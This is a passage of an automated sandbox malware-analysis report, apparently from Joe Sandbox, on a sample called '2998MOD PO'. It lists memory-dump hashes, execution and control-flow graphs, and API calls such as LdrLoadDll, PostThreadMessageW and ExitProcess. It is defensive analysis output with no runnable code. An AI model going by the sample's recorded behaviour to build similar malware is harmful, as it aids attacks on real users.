                          • Instruction Fuzzy Hash: 1A110376804240CFCB16CF44D5C4B16BF71FB94324F24C2A9DC090B256C33AE85AEBA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862707516.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f1d000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                          • Instruction ID: 86081ee818bff8329feade72ded49f8bf511ea4ba3ee6f5d3c090df2a67c7785
                          • Instruction Fuzzy Hash: DD11BB75904280DFCB06CF14C9C4B55BBB1FB84324F24C6AAD8494B696C33AD84ADB61
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862667070.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f0d000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: 97bc849e811555fd99a0046155c0768f9663bc2166099da18347f208fcc74343
                          • Instruction ID: 4f7d77d7a945b1f8deee80b03630dc7fb41692f769caba20f9cae0a3044e79ba
                          • Instruction Fuzzy Hash: 44012B324093409AE7108E69CDC4B67FF98DF41334F18C52AED090A2C6C639D841F671
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862667070.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f0d000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: ccbd05bfe56dd511fc74b56885ac3b9aeedd1c011707860a2cf1bd4455c31fc6
                          • Instruction ID: 9c764cd6bf40817734560a6324a102264268c5da32169076ae14958259efcab4
                          • Instruction Fuzzy Hash: 6DF062724053449AE7148E1AC8C8B66FFA8EB91734F18C45AED085A296C2799845DAB1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: 876d457615757b0eecbe7b80fe4dde82e53ea06a9e5afd92e4a61497ae9ca77d
                          • Instruction ID: 5c0dc045599f5d6c3fc417d231638baade11a80791573cdc2b96b5df28880665
                          • Instruction Fuzzy Hash: 98E1EC74E041198FCB14DFA9C5909AEFBB2BF49304F24C169D815AB35ADB31A981CFA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: 4419567e2e8a95f2c6638ff3759e8e5064c432c1b9df1b51c86ca4c59d075319
                          • Instruction ID: f73337a2587dcd6b8aa091ee72292bd2b8153c6fbfe237cd6e73213154e3be0d
                          • Instruction Fuzzy Hash: 40E10C74E141198FCB14DF99C5809AEFBB2FF49304F24C569D815AB359DB30A981CFA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: 0268df8270b235aafcabe2c9e361d0a2db61739ab523f8b1df3dd1f87f29e846
                          • Instruction ID: ef29c87ff56de9d76317dbe19707c353ca9d0b20bf94c12259c265112ad1b54c
                          • Instruction Fuzzy Hash: 43E1EB74E142198FCB14DFA9C5909AEFBB2BF89304F24C159D815A7359DB30A981CFA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: 4c051fce9bebb5cccfa1324f23361fe1c266916abe1d819b29397c3dab5c4adb
                          • Instruction ID: 37443b35e6a24f9279209522f0ce720a1be2ca953d1d18f457e94baf911bb2e8
                          • Instruction Fuzzy Hash: D2E10C74E041198FCB14DF99C5909AEFBB2FF89304F24C659E414A735ADB30A981CF60
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: 2527cbddec364b15951d0772aea6904feabf73db5f83ab8fece7119e0b507004
                          • Instruction ID: 8e05fef7d4df0c345c48f2308ec856d7e20a056c24faa39d1dd8416b749e7323
                          • Instruction Fuzzy Hash: 39E1EBB4E141198FCB14DF99C5909AEFBB2FF49304F24C159D815AB359DB30A981CFA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: 1f0627e7ad504c32e1143722020c56161890b7b6a08474b0beda820eb7980b24
                          • Instruction ID: 2d3d182f9590755a39f32f5837ec9e337ae5959b2803a26ba05769cd99a91175
                          • Instruction Fuzzy Hash: B4A19136E0021A8FCF19DFB8D84459EBBB2FF85304B15856AE912BB365DB31D946CB40
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: 77c55f546bb8c3ae92954367ff3ed772c2dea5f8f17919aee60cb6f710b01eca
                          • Instruction ID: feccde414e0cf3fc499732518ad74b0cb16ede40a24736eca6b193fc16c607c0
                          • Instruction Fuzzy Hash: 6251FB74E102198BDB14DFA9C9815AEFBF2FF89304F24C269D418A7315DB31A942CFA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: 9e1422fd5612c070002813354b3b23308322680af4135b39274849eaf43cc909
                          • Instruction ID: 61126090c3d418e079f3c88b4fc563349b86b77545fd767df5126dabadaddcf5
                          • Instruction Fuzzy Hash: 1951F874E102198BDB14DFA9C9815AEFBF2FF89304F24C269D418A7315DB31A942CFA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: f20f230c0decfaaf85e1804114f78f7dd1a52e7ee80d9f69a758fa893af2708d
                          • Instruction ID: e39a120ba20d652483fd159d6bdd9d1b22c09f433da71eade4c7db97e1553db3
                          • Instruction Fuzzy Hash: 86514F74E142198FDB14DFA9C5915AEFBF2BF89304F24C16AD418A7316D7309942CFA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: 2c27fe9f7183b6c4408effd81a89e679dd5715f224e92ab5628de83c9572d2dd
                          • Instruction ID: b33494e6cd371a0ff67d7cf00192f79b5d23c534f27d4becbe010d43afbdf01f
                          • Opcode Fuzzy Hash: 2c27fe9f7183b6c4408effd81a89e679dd5715f224e92ab5628de83c9572d2dd
                          • Instruction Fuzzy Hash: 14513CB4E142198FDB14DFA9C5815AEFBF2BF89304F24C56AD418A7356DB309942CFA0

                          Execution Graph

                          Execution Coverage: 1.2%
                          Dynamic/Decrypted Code Coverage: 5.1%
                          Signature Coverage: 8.7%
                          Total number of Nodes: 138
                          Total number of Limit Nodes: 12
                          execution_graph 91451 42ba43 91452 42ba5d 91451->91452 91455 19c2df0 LdrInitializeThunk 91452->91455 91453 42ba85 91455->91453 91456 424b63 91461 424b7c 91456->91461 91457 424c0c 91458 424bc4 91464 42e573 91458->91464 91461->91457 91461->91458 91462 424c07 91461->91462 91463 42e573 RtlFreeHeap 91462->91463 91463->91457 91467 42c7b3 91464->91467 91466 424bd4 91468 42c7cd 91467->91468 91469 42c7de RtlFreeHeap 91468->91469 91469->91466 91560 42f613 91561 42f623 91560->91561 91562 42f629 91560->91562 91565 42e653 91562->91565 91564 42f64f 91568 42c763 91565->91568 91567 42e66e 91567->91564 91569 42c780 91568->91569 91570 42c791 RtlAllocateHeap 91569->91570 91570->91567 91571 4247d3 91572 4247ef 91571->91572 91573 424817 91572->91573 91574 42482b 91572->91574 91575 42c433 NtClose 91573->91575 91576 42c433 NtClose 91574->91576 91577 424820 91575->91577 91578 424834 91576->91578 91581 42e693 RtlAllocateHeap 91578->91581 91580 42483f 91581->91580 91582 413e13 91583 413e2d 91582->91583 91588 417563 91583->91588 91585 413e4b 91586 413e90 91585->91586 91587 413e7f PostThreadMessageW 91585->91587 91587->91586 91590 417587 91588->91590 91589 41758e 91589->91585 91590->91589 91591 4175da 91590->91591 91592 4175d1 LdrLoadDll 91590->91592 91591->91585 91592->91591 91593 418bd3 91594 418c03 91593->91594 91596 418c2f 91594->91596 91597 41b083 91594->91597 91598 41b0c7 91597->91598 91599 41b0e8 91598->91599 91600 42c433 NtClose 91598->91600 91599->91594 91600->91599 91601 41e293 91602 41e2b9 91601->91602 91606 41e3b6 91602->91606 91607 42f743 91602->91607 91604 41e354 91605 42ba93 LdrInitializeThunk 91604->91605 91604->91606 91605->91606 91608 42f6b3 91607->91608 91609 42f710 91608->91609 91610 42e653 RtlAllocateHeap 91608->91610 91609->91604 91611 42f6ed 91610->91611 91612 42e573 RtlFreeHeap 91611->91612 91612->91609 91613 4138b3 91614 4138d5 91613->91614 91616 42c6c3 91613->91616 91617 42c6e0 91616->91617 91620 19c2c70 LdrInitializeThunk 91617->91620 91618 
42c708 91618->91614 91620->91618 91470 401b07 91472 401aa2 91470->91472 91471 401a48 91472->91471 91475 42fae3 91472->91475 91473 401bff 91473->91473 91478 42e0f3 91475->91478 91479 42e117 91478->91479 91490 4072d3 91479->91490 91481 42e140 91489 42e19c 91481->91489 91493 41ae93 91481->91493 91483 42e15f 91487 42e174 91483->91487 91508 42c803 91483->91508 91486 42e18e 91488 42c803 ExitProcess 91486->91488 91504 428113 91487->91504 91488->91489 91489->91473 91492 4072e0 91490->91492 91511 416283 91490->91511 91492->91481 91494 41aebf 91493->91494 91529 41ad83 91494->91529 91497 41aeec 91501 41aef7 91497->91501 91535 42c433 91497->91535 91498 41af20 91498->91483 91500 41af04 91500->91498 91502 42c433 NtClose 91500->91502 91501->91483 91503 41af16 91502->91503 91503->91483 91505 428175 91504->91505 91507 428182 91505->91507 91543 4183d3 91505->91543 91507->91486 91509 42c81d 91508->91509 91510 42c82e ExitProcess 91509->91510 91510->91487 91512 4162a0 91511->91512 91514 4162b9 91512->91514 91515 42cec3 91512->91515 91514->91492 91517 42cedd 91515->91517 91516 42cf0c 91516->91514 91517->91516 91522 42ba93 91517->91522 91520 42e573 RtlFreeHeap 91521 42cf85 91520->91521 91521->91514 91523 42bab0 91522->91523 91526 19c2c0a 91523->91526 91524 42badc 91524->91520 91527 19c2c1f LdrInitializeThunk 91526->91527 91528 19c2c11 91526->91528 91527->91524 91528->91524 91530 41ad9d 91529->91530 91534 41ae79 91529->91534 91538 42bb33 91530->91538 91533 42c433 NtClose 91533->91534 91534->91497 91534->91500 91536 42c44d 91535->91536 91537 42c45e NtClose 91536->91537 91537->91501 91539 42bb4d 91538->91539 91542 19c35c0 LdrInitializeThunk 91539->91542 91540 41ae6d 91540->91533 91542->91540 91544 4183fd 91543->91544 91550 41890b 91544->91550 91551 413a93 91544->91551 91546 41852a 91547 42e573 RtlFreeHeap 91546->91547 91546->91550 91548 418542 91547->91548 91549 42c803 ExitProcess 91548->91549 91548->91550 91549->91550 91550->91507 91555 413ab3 91551->91555 91553 413b1c 91553->91546 91554 
413b12 91554->91546 91555->91553 91556 41b1a3 RtlFreeHeap LdrInitializeThunk 91555->91556 91556->91554 91557 418b28 91558 42c433 NtClose 91557->91558 91559 418b32 91558->91559 91621 19c2b60 LdrInitializeThunk

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 177 417563-41757f 178 417587-41758c 177->178 179 417582 call 42f153 177->179 180 417592-4175a0 call 42f753 178->180 181 41758e-417591 178->181 179->178 184 4175b0-4175c1 call 42dbc3 180->184 185 4175a2-4175ad call 42f9f3 180->185 190 4175c3-4175d7 LdrLoadDll 184->190 191 4175da-4175dd 184->191 185->184 190->191
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
                          • Instruction ID: bdce513adcdf66a5ddf40d0a2ecde4d7099c94072a20f6ffb4ae009ad51faa44
                          • Opcode Fuzzy Hash: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
                          • Instruction Fuzzy Hash: B00171B1E0020DBBDF10DBE1DC42FDEB379AB54308F4081AAE90897241F634EB588B95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 219 42c433-42c46c call 404713 call 42d6b3 NtClose
                          APIs
                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C467
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                          • Instruction ID: 37a102a096cf0697ac499042812ebe3be0a6e3a94df1b2a833282852239f11ec
                          • Opcode Fuzzy Hash: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                          • Instruction Fuzzy Hash: 7DE04F766002147BD620BA5AEC41F97775CDFC5714F00801AFA0867282C675791087F5
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: ee4d6eeb4c57775b10964f33fc86829746728a4d9341e757c103d0b296a77f9f
                          • Instruction ID: 32b65fe00499e4ff81c3b0417a4166d98108297b3e27473672d9aa1a73bb1455
                          • Opcode Fuzzy Hash: ee4d6eeb4c57775b10964f33fc86829746728a4d9341e757c103d0b296a77f9f
                          • Instruction Fuzzy Hash: 9090026520251003410571584418616805E97E0201B55C021E1054590EC52589916226
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 21b9853d557b3ad1bfd31c9293da5e63a4fee6ccdc98d54c2afb65d2ce588455
                          • Instruction ID: c08d561886b6c0464f8df0167ea70c49d75b589606419e154d2d0964525db4a7
                          • Opcode Fuzzy Hash: 21b9853d557b3ad1bfd31c9293da5e63a4fee6ccdc98d54c2afb65d2ce588455
                          • Instruction Fuzzy Hash: FE90023520151413D11171584508707405D97D0241F95C412E0464558ED6568A52A222
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4f3113a4b411b306d5e02f5b3bc33163dad14d0ec905f593db646395e56a7f4d
                          • Instruction ID: ef6e9b01fee5c1c57a293d314e6ddcc7f04b09b9d885b6a3e199d36c37f05570
                          • Opcode Fuzzy Hash: 4f3113a4b411b306d5e02f5b3bc33163dad14d0ec905f593db646395e56a7f4d
                          • Instruction Fuzzy Hash: BF90023520159802D1107158840874A405997D0301F59C411E4464658EC69589917222
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2fd702e2026e88e189fbb8f012faf6c2597b0c62124894d4eefe59f63ef1daa0
                          • Instruction ID: 3339c266c4420204e4cfa94d50dfe09dd73bfae8ac9d51ff37cc169ac7a629e5
                          • Opcode Fuzzy Hash: 2fd702e2026e88e189fbb8f012faf6c2597b0c62124894d4eefe59f63ef1daa0
                          • Instruction Fuzzy Hash: 6290023560561402D10071584518706505997D0201F65C411E0464568EC7958A5166A3

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 413d7a-413d89 1 413df9-413e04 0->1 2 413d8b-413da4 0->2 5 413e06-413e0b 1->5 6 413e6e-413e73 1->6 3 413d43-413d65 2->3 4 413da6-413db1 2->4 7 413d67-413d78 3->7 8 413d1d 3->8 11 413db3 4->11 12 413dcd-413dec 4->12 13 413e0c-413e0e 5->13 9 413e75-413e7d 6->9 10 413edb 6->10 8->3 14 413e9d-413ea3 9->14 15 413e7f-413e8e PostThreadMessageW 9->15 17 413ee9-413eec 10->17 18 413edd-413ee3 10->18 11->12 24 413df0-413df8 12->24 25 413dee 12->25 15->14 19 413e90-413e9a 15->19 20 413ee5-413ee8 18->20 21 413ebb-413ebf 18->21 19->14 21->18 23 413ec1-413ec6 21->23 23->18 26 413ec8-413ecd 23->26 24->1 25->13 25->24 26->18 27 413ecf-413ed6 26->27 27->17 29 413ed8 27->29 29->10
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Ea64OHKq$Ea64OHKq
                          • API String ID: 0-1999359540
                          • Opcode ID: 2170b2706495e477f36690baaeab8e2ed5ef455a2e5be8fe8db28eff5c99c4a6
                          • Instruction ID: 41e09621a5d42bbcee0aa685c486dca4cf25d64e691113f71131abf1b070321e
                          • Opcode Fuzzy Hash: 2170b2706495e477f36690baaeab8e2ed5ef455a2e5be8fe8db28eff5c99c4a6
                          • Instruction Fuzzy Hash: BE310F336043019FC710CE68ACC69EAB769EF85B1570445ABE144CF3A2E2298F83C788

                          Control-flow Graph

                          APIs
                          • PostThreadMessageW.USER32(Ea64OHKq,00000111,00000000,00000000), ref: 00413E8A
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: Ea64OHKq$Ea64OHKq
                          • API String ID: 1836367815-1999359540
                          • Opcode ID: f728d0fd1d093d495b9d187a71c219eeef39321d16eda19571346ca1d6f1b2e0
                          • Instruction ID: 62f55432ef48320368bfc7655e925e1af4bb88519bc3667248631d0393ebb683
                          • Opcode Fuzzy Hash: f728d0fd1d093d495b9d187a71c219eeef39321d16eda19571346ca1d6f1b2e0
                          • Instruction Fuzzy Hash: 5C012671D0021C7AEB11ABE58C82DEF7B7CDF413A8F048169FA14AB241D67D4E068BB1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 44 413e13-413e25 45 413e2d-413e7d call 42f023 call 417563 call 404683 call 424c83 44->45 46 413e28 call 42e613 44->46 55 413e9d-413ea3 45->55 56 413e7f-413e8e PostThreadMessageW 45->56 46->45 56->55 57 413e90-413e9a 56->57 57->55
                          APIs
                          • PostThreadMessageW.USER32(Ea64OHKq,00000111,00000000,00000000), ref: 00413E8A
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: Ea64OHKq$Ea64OHKq
                          • API String ID: 1836367815-1999359540
                          • Opcode ID: 6ed66bee4afdd21d6ca14d40a52513aa6258b5fe58fa69909035cbd9116e2f25
                          • Instruction ID: 832b8f0f82de43865680b143cd41517b910a90eb7c2e8913e91f4129158ae345
                          • Opcode Fuzzy Hash: 6ed66bee4afdd21d6ca14d40a52513aa6258b5fe58fa69909035cbd9116e2f25
                          • Instruction Fuzzy Hash: 10012671D0021C7AEB11AAE18C81DEF7B7CDF40398F048029FA0467241D57D4E058BB5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 193 41760f-417610 194 417612-417623 193->194 195 41759b-4175a0 193->195 196 4175b0-4175c1 call 42dbc3 195->196 197 4175a2-4175ad call 42f9f3 195->197 202 4175c3-4175d0 196->202 203 4175da-4175dd 196->203 197->196 204 4175d1-4175d7 LdrLoadDll 202->204 204->203
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
                          • Instruction ID: 244a9be35222bc483ccb875c85ee509224bce84f5c57bb6526cc21583e77dac4
                          • Opcode Fuzzy Hash: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
                          • Instruction Fuzzy Hash: 81F062B1E04109BADF10DBA0DC91FDEB775AF14705F444266E80497641F635E7888795

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 205 417624-417632 206 4175d1-4175d7 LdrLoadDll 205->206 207 417634-417671 205->207 208 4175da-4175dd 206->208
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
                          • Instruction ID: 3da201fd3e5f4a38d3ab40cb9ffbd160d6eadf765e117ee62af733f6e3875303
                          • Opcode Fuzzy Hash: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
                          • Instruction Fuzzy Hash: BDF09E39699B086BC3118BB998057C9B7E4FF42900F294198DDC9C6E53E363821AC781

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 209 42c763-42c7a7 call 404713 call 42d6b3 RtlAllocateHeap
                          APIs
                          • RtlAllocateHeap.NTDLL(?,0041E354,?,?,00000000,?,0041E354,?,?,?), ref: 0042C7A2
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
                          • Instruction ID: 8478ad7e8697ef7acc63e2c8c0b0e70c508952faf178b19bb78cdc86ac20e0b7
                          • Opcode Fuzzy Hash: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
                          • Instruction Fuzzy Hash: 18E06DB27042047FD610EE59EC45F9B73ACEFC5714F004019F908A7282D770B9108AB5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 214 42c7b3-42c7f4 call 404713 call 42d6b3 RtlFreeHeap
                          APIs
                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,9403D333,00000007,00000000,00000004,00000000,00416E48,000000F4), ref: 0042C7EF
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
                          • Instruction ID: 0103aceadb78e79b7ecc8faacede7f1e09fa23b9d57152ecbc1c1368217fcbeb
                          • Opcode Fuzzy Hash: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
                          • Instruction Fuzzy Hash: 6DE06DB17002047BD610EE59EC81F9B33ADDFC5710F004019FE08A7241D671B9108AB9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 224 42c803-42c83c call 404713 call 42d6b3 ExitProcess
                          APIs
                          • ExitProcess.KERNEL32(?,00000000,00000000,?,355104C2,?,?,355104C2), ref: 0042C837
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: cef4f983fc9ebd551220bca8743f3b8b02da57f9f425297ef17eed880e4366f5
                          • Instruction ID: f8c1995de4c57a0dc7d95be7e0574ee260bed641c46f1d5501e4473e89b5d8ab
                          • Opcode Fuzzy Hash: cef4f983fc9ebd551220bca8743f3b8b02da57f9f425297ef17eed880e4366f5
                          • Instruction Fuzzy Hash: F9E04F756442147FD120BA9ADC41F97776CDFC5714F40401AFA1C67241C674790487F4

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 229 19c2c0a-19c2c0f 230 19c2c1f-19c2c26 LdrInitializeThunk 229->230 231 19c2c11-19c2c18 229->231
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: b2795b8a0a16adcacce1c9de65cec938b79d36d2c3e50573e4e67d5fce2166fc
                          • Instruction ID: b6b13b121cc887ce72d467063fbec4da23604204b3673ea1207d1273ab7e5eb0
                          • Opcode Fuzzy Hash: b2795b8a0a16adcacce1c9de65cec938b79d36d2c3e50573e4e67d5fce2166fc
                          • Instruction Fuzzy Hash: 33B09B71D415D5C5DA11E764460C717795477D0701F15C065D2470641F4738C1D1E277
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
